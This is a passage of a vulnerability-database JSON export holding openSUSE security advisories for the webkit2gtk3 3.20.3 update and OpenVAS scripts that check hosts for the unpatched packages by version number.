"p-cpe:/a:novell:opensuse:typelib-1_0-JavaScriptCore-4_0", "cpe:/o:novell:opensuse:15.0", "p-cpe:/a:novell:opensuse:webkit2gtk3-debugsource", "p-cpe:/a:novell:opensuse:webkit-jsc-4-debuginfo", "p-cpe:/a:novell:opensuse:libwebkit2gtk3-lang", "p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-debuginfo", "p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles-debuginfo", "p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2WebExtension-4_0", "p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles", "p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18", "p-cpe:/a:novell:opensuse:webkit2gtk3-devel", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit-debuginfo", "p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2", "p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2-debuginfo", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-debuginfo", "p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit-debuginfo"], "scheme": null, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}}
{"suse": [{"lastseen": "2018-08-10T04:48:17", "bulletinFamily": "unix", "cvelist": ["CVE-2018-4199", "CVE-2018-4190", "CVE-2018-11646", "CVE-2018-4233", "CVE-2018-4222", "CVE-2018-4218", "CVE-2018-4232"], "description": "This update for webkit2gtk3 to version 2.20.3 fixes the following issues:\n\n These security issues were fixed:\n\n - CVE-2018-4190: An unspecified issue allowed remote attackers to obtain\n sensitive credential information that is transmitted during a CSS\n mask-image fetch (bsc#1097693).\n - CVE-2018-4199: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (buffer overflow and\n application crash) via a crafted web site (bsc#1097693)\n - CVE-2018-4218: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site that triggers an\n @generatorState use-after-free (bsc#1097693)\n - CVE-2018-4222: An unspecified issue allowed remote attackers to execute\n arbitrary code via a crafted web site that leverages a\n getWasmBufferFromValue\n out-of-bounds read during WebAssembly compilation (bsc#1097693)\n - CVE-2018-4232: An unspecified issue allowed remote attackers to\n overwrite cookies via a crafted web site (bsc#1097693)\n - CVE-2018-4233: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1097693)\n - CVE-2018-11646: webkitFaviconDatabaseSetIconForPageURL and\n webkitFaviconDatabaseSetIconURLForPageURL mishandle an unset pageURL,\n leading to an application crash (bsc#1095611).\n\n These non-security issues were fixed:\n\n - Disable Gigacage if mmap fails to allocate in Linux.\n - Add user agent quirk for paypal website.\n - Fix a network process crash when trying to get cookies of about:blank\n page.\n - Fix UI process crash when closing the window under Wayland.\n - 
Fix several crashes and rendering issues.\n\n This update was imported from the SUSE:SLE-15:Update update project.\n\n", "edition": 1, "modified": "2018-08-10T03:08:49", "published": "2018-08-10T03:08:49", "id": "OPENSUSE-SU-2018:2285-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-08/msg00031.html", "title": "Security update for webkit2gtk3 (moderate)", "type": "suse", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-26T02:31:21", "bulletinFamily": "unix", "cvelist": ["CVE-2018-4119", "CVE-2017-7161", "CVE-2018-4129", "CVE-2018-4165", "CVE-2018-4146", "CVE-2017-7165", "CVE-2018-4101", "CVE-2018-4128", "CVE-2018-4199", "CVE-2018-4163", "CVE-2018-12911", "CVE-2018-4120", "CVE-2018-4118", "CVE-2018-4114", "CVE-2018-4190", "CVE-2018-11646", "CVE-2018-11713", "CVE-2018-11712", "CVE-2018-4133", "CVE-2018-4162", "CVE-2017-7153", "CVE-2018-4125", "CVE-2017-7160", "CVE-2018-4233", "CVE-2018-4113", "CVE-2018-4222", "CVE-2017-13884", "CVE-2018-4127", "CVE-2018-4088", "CVE-2018-4204", "CVE-2018-4096", "CVE-2018-4218", "CVE-2018-4246", "CVE-2018-4117", "CVE-2018-4161", "CVE-2017-13885", "CVE-2018-4232", "CVE-2018-4122", "CVE-2018-4200", "CVE-2018-4121"], "description": "This update for webkit2gtk3 to version 2.20.3 fixes the issues:\n\n The following security vulnerabilities were addressed:\n\n - CVE-2018-12911: Fixed an off-by-one error in xdg_mime_get_simple_globs\n (boo#1101999)\n - CVE-2017-13884: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1075775).\n - CVE-2017-13885: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1075775).\n - CVE-2017-7153: An unspecified issue allowed remote attackers to spoof\n user-interface information 
(about whether the entire content is derived\n from a valid TLS session) via a crafted web site that sends a 401\n Unauthorized redirect (bsc#1077535).\n - CVE-2017-7160: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1075775).\n - CVE-2017-7161: An unspecified issue allowed remote attackers to execute\n arbitrary code via special characters that trigger command injection\n (bsc#1075775, bsc#1077535).\n - CVE-2017-7165: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1075775).\n - CVE-2018-4088: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1075775).\n - CVE-2018-4096: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1075775).\n - CVE-2018-4200: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site that triggers a\n WebCore::jsElementScrollHeightGetter use-after-free (bsc#1092280).\n - CVE-2018-4204: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1092279).\n - CVE-2018-4101: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1088182).\n - CVE-2018-4113: An issue in the JavaScriptCore function in the "WebKit"\n component allowed attackers to trigger an assertion failure by\n leveraging improper array 
indexing (bsc#1088182)\n - CVE-2018-4114: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1088182)\n - CVE-2018-4117: An unspecified issue allowed remote attackers to bypass\n the Same Origin Policy and obtain sensitive information via a crafted\n web site (bsc#1088182, bsc#1102530).\n - CVE-2018-4118: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1088182)\n - CVE-2018-4119: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1088182)\n - CVE-2018-4120: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1088182).\n - CVE-2018-4121: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1092278).\n - CVE-2018-4122: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1088182).\n - CVE-2018-4125: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1088182).\n - CVE-2018-4127: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1088182).\n - CVE-2018-4128: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application 
crash) via a crafted web site (bsc#1088182).\n - CVE-2018-4129: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1088182).\n - CVE-2018-4146: An unspecified issue allowed attackers to cause a denial\n of service (memory corruption) via a crafted web site (bsc#1088182).\n - CVE-2018-4161: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1088182).\n - CVE-2018-4162: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1088182).\n - CVE-2018-4163: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1088182).\n - CVE-2018-4165: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1088182).\n - CVE-2018-4190: An unspecified issue allowed remote attackers to obtain\n sensitive credential information that is transmitted during a CSS\n mask-image fetch (bsc#1097693)\n - CVE-2018-4199: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (buffer overflow and\n application crash) via a crafted web site (bsc#1097693)\n - CVE-2018-4218: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site that triggers an\n @generatorState use-after-free (bsc#1097693)\n - CVE-2018-4222: An unspecified issue allowed remote attackers to execute\n arbitrary code via a crafted web site that leverages a\n 
getWasmBufferFromValue\n out-of-bounds read during WebAssembly compilation (bsc#1097693)\n - CVE-2018-4232: An unspecified issue allowed remote attackers to\n overwrite cookies via a crafted web site (bsc#1097693)\n - CVE-2018-4233: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1097693)\n - CVE-2018-4246: An unspecified issue allowed remote attackers to execute\n arbitrary code via a crafted web site that leverages type confusion\n (bsc#1104169)\n - CVE-2018-11646: webkitFaviconDatabaseSetIconForPageURL and\n webkitFaviconDatabaseSetIconURLForPageURL mishandled an unset pageURL,\n leading to an application crash (bsc#1095611)\n - CVE-2018-4133: A Safari cross-site scripting (XSS) vulnerability allowed\n remote attackers to inject arbitrary web script or HTML via a crafted\n URL (bsc#1088182).\n - CVE-2018-11713: The libsoup network backend of WebKit unexpectedly\n failed to use system proxy settings for WebSocket connections. 
As a\n result, users could be deanonymized by crafted web sites via a WebSocket\n connection (bsc#1096060).\n - CVE-2018-11712: The libsoup network backend of WebKit failed to perform\n TLS certificate verification for WebSocket connections (bsc#1096061).\n\n\n This update for webkit2gtk3 fixes the following issues:\n\n - Fixed a crash when atk_object_ref_state_set is called on an AtkObject\n that's being destroyed (bsc#1088932).\n - Fixed crash when using Wayland with QXL/virtio (bsc#1079512)\n - Disable Gigacage if mmap fails to allocate in Linux.\n - Add user agent quirk for paypal website.\n - Properly detect compiler flags, needed libs, and fallbacks for usage of\n 64-bit atomic operations.\n - Fix a network process crash when trying to get cookies of about:blank\n page.\n - Fix UI process crash when closing the window under Wayland.\n - Fix several crashes and rendering issues.\n - Do TLS error checking on GTlsConnection::accept-certificate to finish\n the load earlier in case of errors.\n - Properly close the connection to the nested wayland compositor in the\n Web Process.\n - Avoid painting backing stores for zero-opacity layers.\n - Fix downloads started by context menu failing in some websites due to\n missing user agent HTTP header.\n - Fix video unpause when GStreamerGL is disabled.\n - Fix several GObject introspection annotations.\n - Update user agent quirks to fix Outlook.com and Chase.com.\n - Fix several crashes and rendering issues.\n - Improve error message when Gigacage cannot allocate virtual memory.\n - Add missing WebKitWebProcessEnumTypes.h to webkit-web-extension.h.\n - Improve web process memory monitor thresholds.\n - Fix a web process crash when the web view is created and destroyed\n quickly.\n - Fix a network process crash when load is cancelled while searching for\n stored HTTP auth credentials.\n - Fix the build when ENABLE_VIDEO, ENABLE_WEB_AUDIO and ENABLE_XSLT are\n disabled.\n - New API to retrieve and delete cookies with 
WebKitCookieManager.\n - New web process API to detect when form is submitted via JavaScript.\n - Several improvements and fixes in the touch/gestures support.\n - Support for the \u201csystem\u201d CSS font family.\n - Complex text rendering improvements and fixes.\n - More complete and spec compliant WebDriver implementation.\n - Ensure DNS prefetching cannot be re-enabled if disabled by settings.\n - Fix seek sometimes not working.\n - Fix rendering of emojis that were using the wrong scale factor in some\n cases.\n - Fix rendering of combining enclosed keycap.\n - Fix rendering scale of some layers in HiDPI.\n - Fix a crash in Wayland when closing the web view.\n - Fix upower crashes when running inside a chroot or on systems\n with broken dbus/upower.\n - Fix memory leaks in GStreamer media backend when using GStreamer 1.14.\n - Fix several crashes and rendering issues.\n - Add ENABLE_ADDRESS_SANITIZER to make it easier to build with asan\n support.\n - Fix a crash under Wayland when using mesa software rasterization.\n - Make fullscreen video work again.\n - Fix handling of missing GStreamer elements.\n - Fix rendering when webm video is played twice.\n - Fix kinetic scrolling sometimes jumping around.\n - Fix build with ICU configured without collation support.\n - WebSockets use system proxy settings now (requires libsoup 2.61.90).\n - Show the context menu on long-press gesture.\n - Add support for Shift + mouse scroll to scroll horizontally.\n - Fix zoom gesture to actually zoom instead of changing the page scale.\n - Implement support for Graphics ARIA roles.\n - Make sleep inhibitors work under Flatpak.\n - Add get element CSS value command to WebDriver.\n - Fix a crash after a swipe gesture.\n - Fix several crashes and rendering issues.\n - Fix crashes due to duplicated symbols in libjavascriptcoregtk and\n libwebkit2gtk.\n - Fix parsing of timeout values in WebDriver.\n - Implement get timeouts command in 
WebDriver.\n - Fix deadlock in GStreamer video sink during shutdown when accelerated\n compositing is disabled.\n - Fix several crashes and rendering issues.\n - Add web process API to detect when form is submitted via JavaScript.\n - Add new API to replace webkit_form_submission_request_get_text_fields()\n that is now deprecated.\n - Add WebKitWebView::web-process-terminated signal and deprecate\n web-process-crashed.\n - Fix rendering issues when editing text areas.\n - Use FastMalloc based GstAllocator for GStreamer.\n - Fix web process crash at startup in bmalloc.\n - Fix several memory leaks in GStreamer media backend.\n - WebKitWebDriver process no longer links to libjavascriptcoregtk.\n - Fix several crashes and rendering issues.\n - Add new API to add, retrieve and delete cookies via WebKitCookieManager.\n - Add functions to WebSettings to convert font sizes between points and\n pixels.\n - Ensure cookie operations take effect when they happen before a web\n process has been spawned.\n - Automatically adjust font size when GtkSettings:gtk-xft-dpi changes.\n - Add initial resource load statistics support.\n - Add API to expose availability of certain editing commands in\n WebKitEditorState.\n - Add API to query whether a WebKitNavigationAction is a redirect\n or not.\n - Improve complex text rendering.\n - Add support for the "system" CSS font family.\n - Disable USE_GSTREAMER_GL\n\n This update was imported from the SUSE:SLE-12-SP2:Update update project.\n\n", "edition": 1, "modified": "2018-10-26T00:11:58", "published": "2018-10-26T00:11:58", "id": "OPENSUSE-SU-2018:3473-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-10/msg00071.html", "title": "Security update for webkit2gtk3 (moderate)", "type": "suse", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2020-01-31T17:39:58", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4199", "CVE-2018-4190", 
"CVE-2018-11646", "CVE-2018-4233", "CVE-2018-4222", "CVE-2018-4218", "CVE-2018-4232"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310851975", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851975", "type": "openvas", "title": "openSUSE: Security Advisory for webkit2gtk3 (openSUSE-SU-2018:2285-1)", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851975\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_cve_id(\"CVE-2018-11646\", \"CVE-2018-4190\", \"CVE-2018-4199\", \"CVE-2018-4218\", \"CVE-2018-4222\", \"CVE-2018-4232\", \"CVE-2018-4233\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-10-26 06:24:51 +0200 (Fri, 26 Oct 2018)\");\n script_name(\"openSUSE: Security Advisory for webkit2gtk3 (openSUSE-SU-2018:2285-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap15\\.0\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2018:2285-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2018-08/msg00031.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'webkit2gtk3'\n package(s) announced via the openSUSE-SU-2018:2285-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for webkit2gtk3 to version 2.20.3 fixes the following issues:\n\n These security issues were fixed:\n\n - CVE-2018-4190: An unspecified issue allowed remote attackers to obtain\n sensitive credential information that is 
transmitted during a CSS\n mask-image fetch (bsc#1097693).\n\n - CVE-2018-4199: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (buffer overflow and\n application crash) via a crafted web site (bsc#1097693)\n\n - CVE-2018-4218: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site that triggers an\n @generatorState use-after-free (bsc#1097693)\n\n - CVE-2018-4222: An unspecified issue allowed remote attackers to execute\n arbitrary code via a crafted web site that leverages a\n getWasmBufferFromValue\n out-of-bounds read during WebAssembly compilation (bsc#1097693)\n\n - CVE-2018-4232: An unspecified issue allowed remote attackers to\n overwrite cookies via a crafted web site (bsc#1097693)\n\n - CVE-2018-4233: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1097693)\n\n - CVE-2018-11646: webkitFaviconDatabaseSetIconForPageURL and\n webkitFaviconDatabaseSetIconURLForPageURL mishandle an unset pageURL,\n leading to an application crash (bsc#1095611).\n\n These non-security issues were fixed:\n\n - Disable Gigacage if mmap fails to allocate in Linux.\n\n - Add user agent quirk for paypal website.\n\n - Fix a network process crash when trying to get cookies of about:blank\n page.\n\n - Fix UI process crash when closing the window under Wayland.\n\n - Fix several crashes and rendering issues.\n\n This update was imported from the SUSE:SLE-15:Update update project.\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.0:\n\n zypper in -t patch openSUSE-2018-845=1\");\n\n 
script_tag(name:\"affected\", value:\"webkit2gtk3 on openSUSE Leap 15.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap15.0\") {\n if(!isnull(res = isrpmvuln(pkg:\"libjavascriptcoregtk-4_0-18\", rpm:\"libjavascriptcoregtk-4_0-18~2.20.3~lp150.2.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libjavascriptcoregtk-4_0-18-debuginfo\", rpm:\"libjavascriptcoregtk-4_0-18-debuginfo~2.20.3~lp150.2.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk-4_0-37\", rpm:\"libwebkit2gtk-4_0-37~2.20.3~lp150.2.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk-4_0-37-debuginfo\", rpm:\"libwebkit2gtk-4_0-37-debuginfo~2.20.3~lp150.2.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"typelib-1_0-JavaScriptCore-4_0\", rpm:\"typelib-1_0-JavaScriptCore-4_0~2.20.3~lp150.2.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"typelib-1_0-WebKit2-4_0\", rpm:\"typelib-1_0-WebKit2-4_0~2.20.3~lp150.2.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"typelib-1_0-WebKit2WebExtension-4_0\", rpm:\"typelib-1_0-WebKit2WebExtension-4_0~2.20.3~lp150.2.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit-jsc-4\", rpm:\"webkit-jsc-4~2.20.3~lp150.2.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit-jsc-4-debuginfo\", rpm:\"webkit-jsc-4-debuginfo~2.20.3~lp150.2.3.1\", 
rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk-4_0-injected-bundles\", rpm:\"webkit2gtk-4_0-injected-bundles~2.20.3~lp150.2.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk-4_0-injected-bundles-debuginfo\", rpm:\"webkit2gtk-4_0-injected-bundles-debuginfo~2.20.3~lp150.2.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-debugsource\", rpm:\"webkit2gtk3-debugsource~2.20.3~lp150.2.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-devel\", rpm:\"webkit2gtk3-devel~2.20.3~lp150.2.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-plugin-process-gtk2\", rpm:\"webkit2gtk3-plugin-process-gtk2~2.20.3~lp150.2.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-plugin-process-gtk2-debuginfo\", rpm:\"webkit2gtk3-plugin-process-gtk2-debuginfo~2.20.3~lp150.2.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libjavascriptcoregtk-4_0-18-32bit\", rpm:\"libjavascriptcoregtk-4_0-18-32bit~2.20.3~lp150.2.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libjavascriptcoregtk-4_0-18-32bit-debuginfo\", rpm:\"libjavascriptcoregtk-4_0-18-32bit-debuginfo~2.20.3~lp150.2.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk-4_0-37-32bit\", rpm:\"libwebkit2gtk-4_0-37-32bit~2.20.3~lp150.2.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk-4_0-37-32bit-debuginfo\", rpm:\"libwebkit2gtk-4_0-37-32bit-debuginfo~2.20.3~lp150.2.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk3-lang\", 
rpm:\"libwebkit2gtk3-lang~2.20.3~lp150.2.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:55", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4199", "CVE-2018-4190", "CVE-2018-11646", "CVE-2018-4233", "CVE-2018-4222", "CVE-2018-4218", "CVE-2018-4246", "CVE-2018-4232"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2018-06-17T00:00:00", "id": "OPENVAS:1361412562310874687", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874687", "type": "openvas", "title": "Fedora Update for webkit2gtk3 FEDORA-2018-118b9abf99", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_118b9abf99_webkit2gtk3_fc28.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for webkit2gtk3 FEDORA-2018-118b9abf99\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874687\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-06-17 06:06:02 +0200 (Sun, 17 Jun 2018)\");\n script_cve_id(\"CVE-2018-4190\", \"CVE-2018-4199\", \"CVE-2018-4218\", \"CVE-2018-4222\",\n \"CVE-2018-4232\", \"CVE-2018-4233\", \"CVE-2018-4246\", \"CVE-2018-11646\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for webkit2gtk3 FEDORA-2018-118b9abf99\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'webkit2gtk3'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\non the target host.\");\n script_tag(name:\"affected\", value:\"webkit2gtk3 on Fedora 28\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-118b9abf99\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GY5NYBUZRNA46WQEP2XZCOJFY4BVEJ3X\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n 
script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"webkit2gtk3\", rpm:\"webkit2gtk3~2.20.3~1.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:11", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4199", "CVE-2018-4190", "CVE-2018-11646", "CVE-2018-4233", "CVE-2018-4222", "CVE-2018-4218", "CVE-2018-4246", "CVE-2018-4232"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2018-06-29T00:00:00", "id": "OPENVAS:1361412562310874747", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874747", "type": "openvas", "title": "Fedora Update for webkitgtk4 FEDORA-2018-aac3ca8936", "sourceData": "###############################################################################\n# OpenVAS 